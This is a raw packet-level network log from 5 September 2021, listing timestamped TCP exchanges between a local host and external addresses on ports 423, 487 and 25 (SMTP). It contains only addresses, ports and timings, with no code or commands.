Sep 5, 2021 15:50:58.512401104 CEST	50202	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:58.512991905 CEST	50203	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:58.535805941 CEST	423	50194	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:58.535891056 CEST	50194	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:58.537062883 CEST	423	50202	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:58.537153959 CEST	50202	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:58.542467117 CEST	423	50192	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:58.542587042 CEST	50192	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:58.544301033 CEST	423	50203	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:58.544430971 CEST	50203	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:58.551162004 CEST	423	50191	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:58.551357031 CEST	50191	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:58.553462982 CEST	423	50201	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:58.553570032 CEST	50201	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:58.555886030 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:58.555922985 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:58.556022882 CEST	50197	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:58.636046886 CEST	423	50202	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:58.636095047 CEST	423	50203	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:58.636123896 CEST	423	50200	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:58.636164904 CEST	423	50190	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:58.636193991 CEST	423	50201	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:58.636234999 CEST	50200	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:58.636265039 CEST	50190	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:58.672537088 CEST	50201	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:58.672627926 CEST	50195	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:58.678153992 CEST	50204	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:58.678410053 CEST	50202	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:58.678667068 CEST	50203	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:58.689759016 CEST	50197	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:58.703906059 CEST	423	50202	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:58.707855940 CEST	423	50200	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:58.708096981 CEST	50200	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:58.710004091 CEST	423	50203	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:58.714284897 CEST	423	50201	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:58.743766069 CEST	423	50195	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:58.743889093 CEST	50195	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:58.751641035 CEST	423	50204	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:58.751787901 CEST	50204	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:58.772274971 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:58.779448986 CEST	423	50200	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:58.825445890 CEST	423	50204	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:58.839416027 CEST	50204	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:58.843156099 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.844348907 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:58.852032900 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:58.913674116 CEST	423	50204	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:58.913816929 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.913955927 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.932394028 CEST	50199	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.932900906 CEST	50206	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.986490965 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.000540972 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.000822067 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.001661062 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.003472090 CEST	423	50199	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:59.003608942 CEST	50199	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:59.006071091 CEST	423	50206	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:59.006216049 CEST	50206	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:59.027031898 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.027183056 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.070668936 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.079628944 CEST	423	50206	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:59.100712061 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.139097929 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.139303923 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:59.142535925 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.142560005 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.142575026 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.142677069 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:59.144676924 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.144836903 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:59.147099018 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.152570963 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.152601004 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.152611971 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.152734041 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:59.197772026 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.197788954 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.252124071 CEST	50206	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:59.355776072 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.360316992 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.360335112 CEST	50206	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:59.366605997 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.427783012 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.427844048 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.430454016 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.431296110 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.432965994 CEST	423	50206	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:59.436701059 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.442063093 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.446158886 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.453022957 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:59.464299917 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.464637041 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.464687109 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.464780092 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.464859962 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.464911938 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.464984894 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.465107918 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.465182066 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.465243101 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.534740925 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.535207033 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.535511971 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.535865068 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.567929983 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.568049908 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.568161964 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.568537951 CEST	50205	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:59.637877941 CEST	487	50205	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:59.713437080 CEST	50200	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:59.713498116 CEST	50202	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:59.713502884 CEST	50201	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:59.713995934 CEST	50203	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:59.714065075 CEST	50207	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:59.714401960 CEST	50208	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:59.714786053 CEST	50209	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:59.715171099 CEST	50210	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:59.738603115 CEST	423	50202	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:59.738746881 CEST	50202	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:59.739583015 CEST	423	50209	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:59.739701986 CEST	50209	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:59.745543003 CEST	423	50203	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:59.745666027 CEST	50203	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:59.746085882 CEST	423	50210	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:59.746167898 CEST	50210	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:59.755460978 CEST	423	50208	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:59.755498886 CEST	423	50201	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:59.755600929 CEST	50208	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:59.755640030 CEST	50201	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:59.766249895 CEST	423	50209	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:59.766529083 CEST	50209	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:59.771358013 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.778884888 CEST	423	50210	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:59.781260967 CEST	50210	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:59.784913063 CEST	423	50200	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:59.784989119 CEST	50200	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:59.788192034 CEST	423	50207	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:59.788336992 CEST	50207	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:59.792270899 CEST	423	50209	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:59.795876026 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.797306061 CEST	423	50208	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:59.797513008 CEST	50208	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:59.813577890 CEST	423	50210	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:59.822092056 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.831155062 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.839802980 CEST	423	50208	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:59.860409975 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.862517118 CEST	423	50207	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:59.862720966 CEST	50207	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:59.869714022 CEST	50204	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:59.870249033 CEST	50211	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:59.886023045 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.918674946 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.936748028 CEST	423	50207	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:59.943595886 CEST	423	50204	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:59.943717957 CEST	50204	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:59.944320917 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.944416046 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.947554111 CEST	423	50211	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:59.947742939 CEST	50211	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:59.969888926 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.971811056 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:59.983418941 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:59.995887995 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.008944035 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:51:00.009140015 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:51:00.009356022 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:51:00.009406090 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:51:00.010323048 CEST	50206	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.011022091 CEST	50213	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.025453091 CEST	423	50211	193.56.146.42	192.168.2.4
Sep 5, 2021 15:51:00.034739971 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:51:00.034841061 CEST	50211	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:00.068017960 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.068152905 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.069092989 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:51:00.069183111 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:51:00.069240093 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:51:00.072065115 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:51:00.078308105 CEST	423	50213	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:00.078422070 CEST	50213	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.083070040 CEST	423	50206	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:00.083147049 CEST	50206	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.112163067 CEST	423	50211	193.56.146.42	192.168.2.4
Sep 5, 2021 15:51:00.122364044 CEST	50214	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:51:00.145862103 CEST	423	50213	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:00.146061897 CEST	50213	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.164920092 CEST	50215	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:51:00.176059008 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.176400900 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.192775011 CEST	25	50215	62.141.42.208	192.168.2.4
Sep 5, 2021 15:51:00.192917109 CEST	50215	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:51:00.197067022 CEST	50216	25	192.168.2.4	52.101.24.0
Sep 5, 2021 15:51:00.197874069 CEST	50208	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.197890997 CEST	50210	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.197906971 CEST	50209	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.198431015 CEST	50217	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.198767900 CEST	50218	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.199284077 CEST	50219	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.213352919 CEST	423	50213	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:00.222934008 CEST	423	50209	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.223018885 CEST	50209	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.223784924 CEST	423	50218	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.223884106 CEST	50218	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.228883982 CEST	423	50210	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.228979111 CEST	50210	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.229902983 CEST	423	50219	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.230043888 CEST	50219	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.239310980 CEST	423	50217	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:00.239348888 CEST	423	50208	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:00.239478111 CEST	50208	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.239593983 CEST	50217	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.248445988 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.250587940 CEST	423	50218	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.250943899 CEST	50218	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.260998011 CEST	423	50219	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.261277914 CEST	50219	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.268887997 CEST	25	50214	96.114.157.80	192.168.2.4
Sep 5, 2021 15:51:00.269037008 CEST	50214	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:51:00.276204109 CEST	423	50218	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.280977964 CEST	423	50217	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:00.281339884 CEST	50217	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.281958103 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.285979033 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.286073923 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.292047977 CEST	423	50219	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.322007895 CEST	423	50217	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:00.322959900 CEST	50207	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:00.323678017 CEST	50220	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:00.341120958 CEST	25	50216	52.101.24.0	192.168.2.4
Sep 5, 2021 15:51:00.341305017 CEST	50216	25	192.168.2.4	52.101.24.0
Sep 5, 2021 15:51:00.341922045 CEST	50216	25	192.168.2.4	52.101.24.0
Sep 5, 2021 15:51:00.358314991 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.358690023 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.374543905 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:51:00.393570900 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.395376921 CEST	423	50220	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:00.395586014 CEST	50220	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:00.397078991 CEST	423	50207	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:00.397207022 CEST	50207	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:00.403860092 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404009104 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404058933 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404230118 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404248953 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404268980 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404330969 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.404401064 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.467963934 CEST	423	50220	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:00.468445063 CEST	50220	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:51:00.476794958 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.477701902 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.478166103 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.478482008 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.485440016 CEST	25	50216	52.101.24.0	192.168.2.4
Sep 5, 2021 15:51:00.486308098 CEST	25	50216	52.101.24.0	192.168.2.4
Sep 5, 2021 15:51:00.486382008 CEST	50216	25	192.168.2.4	52.101.24.0
Sep 5, 2021 15:51:00.486651897 CEST	25	50216	52.101.24.0	192.168.2.4
Sep 5, 2021 15:51:00.486706018 CEST	50216	25	192.168.2.4	52.101.24.0
Sep 5, 2021 15:51:00.515455008 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.515784979 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.515892029 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.525002956 CEST	50212	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.540235996 CEST	423	50220	193.56.146.41	192.168.2.4
Sep 5, 2021 15:51:00.596436977 CEST	487	50212	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.629944086 CEST	25	50214	96.114.157.80	192.168.2.4
Sep 5, 2021 15:51:00.629971027 CEST	25	50214	96.114.157.80	192.168.2.4
Sep 5, 2021 15:51:00.630105972 CEST	50214	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:51:00.738306999 CEST	50214	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:51:00.807298899 CEST	50211	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:00.807847977 CEST	50221	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:00.826386929 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:00.860461950 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.869777918 CEST	50213	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.870313883 CEST	50224	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.875159979 CEST	423	50221	193.56.146.42	192.168.2.4
Sep 5, 2021 15:51:00.875256062 CEST	50221	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:00.880422115 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:00.880506992 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:00.884814024 CEST	25	50214	96.114.157.80	192.168.2.4
Sep 5, 2021 15:51:00.888245106 CEST	423	50211	193.56.146.42	192.168.2.4
Sep 5, 2021 15:51:00.888335943 CEST	50211	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:00.916682005 CEST	50217	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.916726112 CEST	50218	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.916732073 CEST	50219	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.917162895 CEST	50225	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.917543888 CEST	50226	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.917932987 CEST	50227	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.934238911 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:00.934323072 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:00.935775995 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:00.937614918 CEST	423	50213	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:00.937683105 CEST	50213	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.939862967 CEST	423	50224	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:00.939954042 CEST	50224	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:00.941895008 CEST	423	50218	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.941993952 CEST	50218	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.942213058 CEST	423	50226	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.942275047 CEST	50226	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.944628000 CEST	423	50221	193.56.146.42	192.168.2.4
Sep 5, 2021 15:51:00.944788933 CEST	50221	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:51:00.947496891 CEST	423	50219	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.947562933 CEST	50219	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.948318005 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:00.948540926 CEST	423	50227	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.948610067 CEST	50227	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.957479954 CEST	423	50217	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:00.957575083 CEST	50217	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.958018064 CEST	423	50225	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:00.958117008 CEST	50225	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:00.968283892 CEST	423	50226	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:00.968475103 CEST	50226	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:51:00.979410887 CEST	423	50227	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:00.979634047 CEST	50227	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:51:00.993267059 CEST	423	50226	213.227.140.23	192.168.2.4
Sep 5, 2021 15:51:01.001374006 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.004153013 CEST	423	50225	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:01.004359007 CEST	50225	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:51:01.004487038 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.009592056 CEST	423	50224	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:01.009783983 CEST	50224	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:51:01.010303020 CEST	423	50227	5.61.37.41	192.168.2.4
Sep 5, 2021 15:51:01.011920929 CEST	423	50221	193.56.146.42	192.168.2.4
Sep 5, 2021 15:51:01.012767076 CEST	50222	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:51:01.041466951 CEST	487	50223	193.56.146.188	192.168.2.4
Sep 5, 2021 15:51:01.042316914 CEST	50223	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:51:01.045506001 CEST	423	50225	95.216.195.92	192.168.2.4
Sep 5, 2021 15:51:01.066370964 CEST	25	50222	142.250.150.27	192.168.2.4
Sep 5, 2021 15:51:01.078780890 CEST	423	50224	193.56.146.43	192.168.2.4
Sep 5, 2021 15:51:01.082479954 CEST	50222	25	192.168.2.4	142.250.150.27
